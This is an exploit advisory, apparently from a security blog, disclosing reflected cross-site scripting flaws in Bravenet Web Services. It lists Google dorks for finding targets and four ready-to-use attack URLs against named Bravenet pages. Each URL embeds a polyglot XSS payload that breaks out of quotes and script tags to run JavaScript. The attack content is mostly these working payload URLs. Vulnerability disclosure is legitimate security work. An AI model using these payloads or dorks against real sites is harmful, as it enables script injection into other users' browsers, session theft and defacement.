# Exploit Title: Bravenet Web Services Cross Site Scripting
# Date: 29.02.2012
# Author: Sony
# Software Link: www.bravenet.com
# Google Dorks: inurl:calendar/day.php?usernum= or inurl:http://pub22.bravenet.com or what you want
# Web Browser : Mozilla Firefox
# Blog : http://st2tea.blogspot.com
# PoC:
http://st2tea.blogspot.com/2012/02/bravenet-web-services-cross-site.html
..................................................................
What is Bravenet? Simple, but interesting services.
http://wiki.bravenet.com/Main_Page
We have a multiple cross site scripting vulnerabilities.
1. signup.php
http://www.bravenet.com/signup/signup.php?serv_name=%27;alert%28String.fromCharCode%2888,83,83%29%29//\%27;alert%28String.fromCharCode%2888,83,83%29%29//%22;alert%28String.fromCharCode%2888,83,83%29%29//\%22;alert%28String.fromCharCode%2888,83,83%29%29//--%3E%3C/SCRIPT%3E%22%3E%27%3E%3CSCRIPT%3Ealert%28String.fromCharCode%2888,83,83%29%29%3C/SCRIPT%3E
2. rate.php
http://pub22.bravenet.com/freelink/rate.php?usernum=1852580888&id=892119%27;alert%28String.fromCharCode%2888,83,83%29%29//\%27;alert%28String.fromCharCode%2888,83,83%29%29//%22;alert%28String.fromCharCode%2888,83,83%29%29//\%22;alert%28String.fromCharCode%2888,83,83%29%29//--%3E%3C/SCRIPT%3E%22%3E%27%3E%3CSCRIPT%3Ealert%28String.fromCharCode%2888,83,83%29%29%3C/SCRIPT%3E
3. forum/static/show.php
http://pub22.bravenet.com/forum/static/show.php?usernum=1868266528&frmid=1811%27;alert%28String.fromCharCode%2888,83,83%29%29//\%27;alert%28String.fromCharCode%2888,83,83%29%29//%22;alert%28String.fromCharCode%2888,83,83%29%29//\%22;alert%28String.fromCharCode%2888,83,83%29%29//--%3E%3C/SCRIPT%3E%22%3E%27%3E%3CSCRIPT%3Ealert%28String.fromCharCode%2888,83,83%29%29%3C/SCRIPT%3E&msgid=0
4. calendar/day.php
http://pub22.bravenet.com/calendar/day.php?usernum=1875234170%27;alert%28String.fromCharCode%2888,83,83%29%29//\%27;alert%28String.fromCharCode%2888,83,83%29%29//%22;alert%28String.fromCharCode%2888,83,83%29%29//\%22;alert%28String.fromCharCode%2888,83,83%29%29//--%3E%3C/SCRIPT%3E%22%3E%27%3E%3CSCRIPT%3Ealert%28String.fromCharCode%2888,83,83%29%29%3C/SCRIPT%3E&y=2012&m=02&d=08
Etc..
0 comentarii:
Trimiteți un comentariu
Rețineți: Numai membrii acestui blog pot posta comentarii.